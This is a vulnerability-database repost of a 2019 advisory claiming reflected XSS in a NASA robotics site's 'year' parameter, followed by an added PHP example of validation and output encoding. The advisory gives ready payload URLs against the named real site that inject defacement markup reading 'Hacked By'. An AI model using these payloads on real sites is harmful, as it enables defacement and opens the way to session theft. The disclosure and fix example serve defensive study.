National Aeronautics and Space Administration Robotics Alliance Project Reflected XSS Cross Site Scripting - CXSecurity.com

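Vulnerability ID: 1708140 Vulnerability Type:
Published: 2019-08-20 Updated: 2019-08-20
CVE ID: N/A CNNVD-ID: N/A
Affected Platform: N/A CVSS Score: N/A
|Vulnerability Source
https://cxsecurity.com/issue/WLB-2019080082
|Vulnerability Details
Vulnerability details have not yet been disclosed
|Vulnerability Exploit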
###################################################################

# Exploit Title : National Aeronautics and Space Administration Robotics Alliance Project Reflected XSS Cross Site Scripting
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/08/2019
# Vendor Homepage : robotics.nasa.gov
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-79 [ Improper Neutralization of Input 
During Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/ascii/WLB-2019010038

###################################################################

Impact - Reflected XSS Cross Site Scripting (or Non-Persistent) :
*********************************************************
The server reads data directly from the HTTP request and reflects it back in the 
HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply 
dangerous content to a vulnerable web application, which is then reflected back to the victim
and executed by the web browser. The most common mechanism for delivering malicious 
content is to include it as a parameter in a URL that is posted publicly or e-mailed directly 
to the victim. URLs constructed in this manner constitute the core of many phishing 
schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. 
After the site reflects the attacker's content back to the victim, the content is 
executed by the victim's browser. A successful exploit could allow the attacker
to execute arbitrary script code in the context of the affected site
and allow the attacker to access sensitive browser-based information.
An attacker, for example, can exploit this vulnerability to steal cookies from
the attacked user in order to hijack a session and gain access to the system.

###################################################################

# Reflected Cross Site Scripting XSS Exploits and Payloads :
*******************************************************
/first/houseteamlist.php?year=1'<marquee%20><font%20color=
lime%20size=32>XSS-Vulnerability-Discovered-Hacked%20By%20%20KingSkrupellos</font></marquee>

/first/houseteamlist.php?year=<center><img%20src=
"https://www.cyberizm.org/images/logo.png"%20width="500"%20height="500">
</center><font%20color="red"%20size="100px"%20face=
"courier%20new">XSS-Vulnerability-Discovered-ByHacked%20By%20%20KingSkrupellos%85

###################################################################

# Example Vulnerable Sites :
*************************
[+] robotics.nasa.gov/first/houseteamlist.php?year=%3Ccenter%3E%3Cimg%20src=
%22https://www.cyberizm.org/images/logo.png%22%20width=%22500%22%20
height=%22500%22%3E%3C/center%3E%3Cfont%20color=%22red%22%20size=
%22100px%22%20face=%22courier%20new%22%3EHacked%20By%20%20KingSkrupellos%85

[+] robotics.nasa.gov/first/houseteamlist.php?year=1'<marquee%20><font%20color=
lime%20size=32>XSS-Vulnerability-Discovered-Hacked%20By%20%20KingSkrupellos</font></marquee>

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################
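
Added example, not part of the original advisory and not the affected site's code: a hypothetical PHP handler for a `year` query parameter, showing the reflect-without-encoding pattern described in the Impact section next to a hardened form (integer allow-list validation, then HTML output encoding). The function names, year bounds and sample inputs are assumptions constructed for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical handler logic for a page that takes ?year=; the real
// houseteamlist.php source is not shown in the advisory.
const MIN_YEAR = 1990; // assumed bounds, for illustration only
const MAX_YEAR = 2100;

// Vulnerable pattern (CWE-79): request data concatenated into HTML as-is.
function heading_unsafe(string $rawYear): string
{
    return '<h2>Team list for ' . $rawYear . '</h2>';
}

// Hardened: allow-list validation first, output encoding second.
function heading_safe(string $rawYear): string
{
    $year = filter_var($rawYear, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => MIN_YEAR, 'max_range' => MAX_YEAR],
    ]);
    if ($year === false) {
        // Reject outright; do not echo the bad value back, even encoded.
        return '<h2>Invalid year</h2>';
    }
    // Encoding is kept even for a validated integer (defence in depth).
    $text = htmlspecialchars((string) $year, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>Team list for ' . $text . '</h2>';
}

// For free-text fields that cannot be allow-listed, encode on output
// so markup characters arrive in the browser as text, not as tags.
function encode_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs: one valid year, one with harmless markup appended.
$samples = ['2019', "1'<b>injected</b>"];
foreach ($samples as $s) {
    echo 'input   : ', $s, PHP_EOL;
    echo 'unsafe  : ', heading_unsafe($s), PHP_EOL;
    echo 'safe    : ', heading_safe($s), PHP_EOL;
    echo 'encoded : ', encode_for_html($s), PHP_EOL, PHP_EOL;
}
```

Run with `php` on the command line; for the second input the unsafe heading contains a live `<b>` element, while the safe heading rejects the value and the encoded form renders the markup as literal text.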